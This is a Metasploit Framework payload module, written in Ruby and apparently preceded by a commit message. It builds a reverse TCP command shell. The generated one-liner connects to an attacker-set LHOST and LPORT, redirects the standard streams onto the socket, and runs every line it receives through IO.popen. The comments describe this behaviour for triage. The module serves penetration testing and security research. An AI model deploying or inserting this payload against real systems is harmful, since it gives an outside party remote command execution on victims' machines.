be39079830
Note that this commit needed a --no-verify because of the erroneous check in msftidy for writing to stdout. The particular syntax of this payload makes it look like we're doing that when we're really not. So don't sweat it.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'msf/core/payload/ruby'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
# Single (non-staged) Ruby payload module: produces a Ruby one-liner that
# connects back to a listener and serves a line-oriented command shell.
#
# The module only builds source text. Every $stdin/$stdout/$stderr reference
# below sits inside the generated string and is never executed by the
# framework process itself.
module Metasploit3

  include Msf::Payload::Single
  include Msf::Payload::Ruby
  include Msf::Sessions::CommandShellOptions

  # Registers the module metadata with the framework.
  #
  # @param info [Hash] caller-supplied metadata, combined with this module's
  #   own entries through merge_info
  def initialize(info = {})
    module_info = {
      'Name'        => 'Ruby Command Shell, Reverse TCP',
      'Description' => 'Connect back and create a command shell via Ruby',
      'Author'      => [ 'kris katterjohn', 'hdm' ],
      'License'     => MSF_LICENSE,
      'Platform'    => 'ruby',
      'Arch'        => ARCH_RUBY,
      'Handler'     => Msf::Handler::ReverseTcp,
      'Session'     => Msf::Sessions::CommandShell,
      'PayloadType' => 'ruby',
      # Static payload body is left empty; the text comes from #generate.
      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
    }

    super(merge_info(info, module_info))
  end

  # Builds the final payload text.
  #
  # @return the result of passing #ruby_string through prepends, a helper
  #   defined outside this file (presumably by Msf::Payload::Ruby; confirm)
  def generate
    prepends(ruby_string)
  end

  # Assembles the Ruby one-liner from the LHOST and LPORT datastore options.
  #
  # What the generated code does when run on a host, useful when triaging it:
  # * opens a plain TCPSocket to LHOST:LPORT (no TLS, so traffic is cleartext);
  # * reopens $stdin, $stdout and $stderr onto that socket;
  # * reads one line at a time, strips it and skips empty lines;
  # * runs each line through IO.popen in "rb" mode and writes every output
  #   line, stripped, back to the socket;
  # * swallows any error from a command via the trailing `rescue nil`.
  # Observable result: a ruby process whose standard streams are an outbound
  # TCP connection and which spawns a child process per received line.
  #
  # @return [String] Ruby source for the reverse command shell
  def ruby_string
    host = datastore['LHOST']
    # IPv6 literals are wrapped in square brackets before interpolation.
    host = "[#{host}]" if Rex::Socket.is_ipv6?(host)
    # to_i guarantees only an integer reaches the generated source.
    # NOTE(review): LHOST is interpolated without escaping; presumably the
    # option type validates it as an address upstream. Confirm.
    port = datastore['LPORT'].to_i

    connect = "require 'socket';c=TCPSocket.new(\"#{host}\", #{port});"
    redirect_and_read = "$stdin.reopen(c);$stdout.reopen(c);$stderr.reopen(c);$stdin.each_line{|l|l=l.strip;next if l.length==0;"
    run_and_reply = "(IO.popen(l,\"rb\"){|fd| fd.each_line {|o| c.puts(o.strip) }}) rescue nil }"

    connect + redirect_and_read + run_and_reply
  end

end